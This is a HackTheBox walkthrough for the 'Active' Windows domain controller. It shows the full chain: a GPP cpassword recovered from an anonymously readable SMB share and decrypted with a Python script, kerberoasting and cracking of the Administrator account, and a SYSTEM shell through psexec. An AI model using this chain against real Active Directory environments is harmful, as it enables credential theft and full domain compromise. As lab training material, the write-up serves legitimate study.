# Active - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Active was a quick easy-rated HTB Windows machine created by [eks](https://app.hackthebox.com/users/302) and [mrb3n](https://app.hackthebox.com/users/2984)

We decrypt a GPP password obtained from an SMB share with null authentication for foothold.  
For root, we kerberoast Administrator.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.096s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown
49170/tcp open  unknown
49171/tcp open  unknown
```

```console
opcode@parrot$ nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49170,49171 -oN active.nmap 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.10s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-07-22 16:27:38Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-07-22T16:28:35
|_  start_date: 2023-07-21T05:56:08
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required
```

Several ports are open, including DNS, Kerberos, SMB, RPC and LDAP. It's likely a DC.

We can start with LDAP enumeration:

```console
opcode@parrot$ ldapsearch -x -H ldap://10.10.10.100 -s base -b "" -LLL
dn:
currentTime: 20230722163453.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=active,DC=htb
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
 =Sites,CN=Configuration,DC=active,DC=htb
namingContexts: DC=active,DC=htb
namingContexts: CN=Configuration,DC=active,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
namingContexts: DC=DomainDnsZones,DC=active,DC=htb
namingContexts: DC=ForestDnsZones,DC=active,DC=htb
defaultNamingContext: DC=active,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=active,DC=htb
configurationNamingContext: CN=Configuration,DC=active,DC=htb
rootDomainNamingContext: DC=active,DC=htb
[--SNIP--]
supportedLDAPVersion: 3
supportedLDAPVersion: 2
[--SNIP--]
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: DC.active.htb
ldapServiceName: active.htb:dc$@ACTIVE.HTB
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb
[--SNIP--]
```

We have the FQDN `DC.active.htb` here; we can add it to `/etc/hosts`:

```text
10.10.10.100 DC.active.htb active.htb DC
```

## SMB enumeration

We can enumerate SMB shares. `CrackMapExec` is my tool of choice these days:

```console
opcode@parrot$ docker run -it --entrypoint=/bin/bash --rm --name cmexec cme:latest
root@c93e38f261fa:~# echo '10.10.10.100 DC.active.htb active.htb DC' >> /etc/hosts
```

Testing for null session:

```console
root@c93e38f261fa:~# cme smb 10.10.10.100 -d active.htb -u '' -p '' --shares
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\: 
SMB         10.10.10.100    445    DC               [*] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON                        Logon server share 
SMB         10.10.10.100    445    DC               Replication     READ            
SMB         10.10.10.100    445    DC               SYSVOL                          Logon server share 
SMB         10.10.10.100    445    DC               Users                           
```

Null sessions are enabled, but we can only read the `Replication` share.

Testing for guest session:

```console
root@c93e38f261fa:~# cme smb 10.10.10.100 -d active.htb -u 'opcode' -p '' --shares
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [-] active.htb\opcode: STATUS_LOGON_FAILURE 
```

Guest sessions are disabled.

I prefer to use [impacket](https://github.com/fortra/impacket) to explore SMB shares:

```console
opcode@parrot$ smbclient.py active.htb/''@dc.active.htb -no-pass
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra

Type help for list of commands
# use Replication
# ls
drw-rw-rw-          0  Sat Jul 21 16:07:44 2018 .
drw-rw-rw-          0  Sat Jul 21 16:07:44 2018 ..
drw-rw-rw-          0  Sat Jul 21 16:07:44 2018 active.htb
# cd active.htb
# ls
drw-rw-rw-          0  Sat Jul 21 16:07:44 2018 .
drw-rw-rw-          0  Sat Jul 21 16:07:44 2018 ..
drw-rw-rw-          0  Sat Jul 21 16:07:44 2018 DfsrPrivate
drw-rw-rw-          0  Sat Jul 21 16:07:44 2018 Policies
drw-rw-rw-          0  Sat Jul 21 16:07:44 2018 scripts
```

There are several subdirectories, and I looked through them all since we don't have any other leads.  
Inside `\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups` I found `Groups.xml`:

```xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
```

It is a file stored by Group Policy Preferences (GPP). GPP is helpful for administrators: it provides a mechanism to deploy scheduled tasks with explicit credentials, change the local admin passwords on large numbers of computers and can perform other similar tasks gracefully.  
Although the credentials are encrypted, they are as good as plaintext credentials to us attackers.  
It is so because Microsoft has published the AES private key: <https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be> and they use 16 null bytes for IV  
You can read more about this issue here: <https://adsecurity.org/?p=2288>

[impacket](https://github.com/fortra/impacket) comes with `Get-GPPPassword.py`, which performs a breadth-first search to recursively finds GPP XML files and carries out the decryption.

```console
opcode@parrot$ Get-GPPPassword.py active.htb/''@dc.active.htb -no-pass -share Replication
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra

[*] Listing shares...
  - ADMIN$
  - C$
  - IPC$
  - NETLOGON
  - Replication
  - SYSVOL
  - Users

[*] Searching *.xml files...
[*] NewName : 
[*] Changed : 2018-07-18 20:46:06
[*] Username    : active.htb\SVC_TGS
[*] Password    : GPPstillStandingStrong2k18
[*] File    : \\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml 
```

We could have decrypted the `cpassword` ourselves:

```py
from base64 import b64decode
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

ciphertext_b64 = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
ciphertext = b64decode(ciphertext_b64 + "===")

key = b"\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
iv = b"\x00" * 16

cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = cipher.decrypt(ciphertext)
plaintext = unpad(plaintext, 16)

print(plaintext.decode("utf-16-le"))
```

```console
opcode@parrot$ python3 decrypt.py
GPPstillStandingStrong2k18
```

We can validate these credentials with [kerbrute](https://github.com/ropnop/kerbrute):

```console
opcode@parrot$ echo svc_tgs:GPPstillStandingStrong2k18 | ./kerbrute bruteforce --dc 10.10.10.100 -d active.htb -v -

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/23/23 - Ronnie Flathers @ropnop

2023/07/23 09:52:34 >  Using KDC(s):
2023/07/23 09:52:34 >   10.10.10.100:88

2023/07/23 09:52:39 >  [+] VALID LOGIN:  svc_tgs@active.htb:GPPstillStandingStrong2k18
2023/07/23 09:52:39 >  Done! Tested 1 logins (1 successes) in 5.328 seconds
```

## AD enumeration

The WinRM port is not open on this box.
We can test if any more shares are readable/writable by this user:

```console
root@bd5dce02ddd3:~# cme smb 10.10.10.100 -d active.htb -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' --shares
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18 
SMB         10.10.10.100    445    DC               [*] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.10.100    445    DC               Replication     READ            
SMB         10.10.10.100    445    DC               SYSVOL          READ            Logon server share 
SMB         10.10.10.100    445    DC               Users           READ            
```

That `Users`share is the only non-default share that we can access now. It's there so that we can grab the user flag.  

We should also enumerate other users on the box:

```console
root@34cbf4504d74:~# cme ldap 10.10.10.100 -d active.htb -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' --users
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
LDAP        10.10.10.100    389    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18 
LDAP        10.10.10.100    389    DC               [*] Total of records returned 7
LDAP        10.10.10.100    389    DC               Administrator                  Built-in account for administering the computer/domain
LDAP        10.10.10.100    389    DC               Guest                          Built-in account for guest access to the computer/domain
LDAP        10.10.10.100    389    DC               krbtgt                         Key Distribution Center Service Account
LDAP        10.10.10.100    389    DC               SVC_TGS                        
```

We likely need to get a straight Administrator from here.  
To look for possible exploit paths, we can use Bloodhound.  
A python-based ingestor (<https://github.com/fox-it/bloodhound.py>) can be used:

```console
opcode@parrot$ bloodhound-python -u svc_tgs -p GPPstillStandingStrong2k18 -ns 10.10.10.100 -d active.htb -c All --zip
```

We can now start neo4j with:

```console
opcode@parrot$ sudo neo4j console
```

Finally, we can run the BloodHound binary:

```console
opcode@parrot$ ./BloodHound
```

Once on the interface, we can select "Upload Data" and select the zip file generated by the ingestor.  
We can search for `SVC_TGS@ACTIVE.HTB` and mark it as owned.  
From the "Analysis" tab, we can query "List all kerberoastable accounts"

![1](images/1.png)

The administrator himself is kerberoastable :)

```console
opcode@parrot$ GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip 10.10.10.100 active.htb/svc_tgs:GPPstillStandingStrong2k18              
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 00:36:40.351723  2023-07-23 01:09:44.168957             
```

Now, we can attempt to crack it with John:

```console
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt kerberoastables.txt
```

Therefore, we get admin credentials:

```text
Administrator:Ticketmaster1968
```

We can use them with `psexec.py`:

```console
opcode@parrot$ psexec.py active.htb/Administrator:Ticketmaster1968@dc.active.htb 
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra

[*] Requesting shares on dc.active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file kAxwgbUk.exe
[*] Opening SVCManager on dc.active.htb.....
[*] Creating service crMx on dc.active.htb.....
[*] Starting service crMx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```
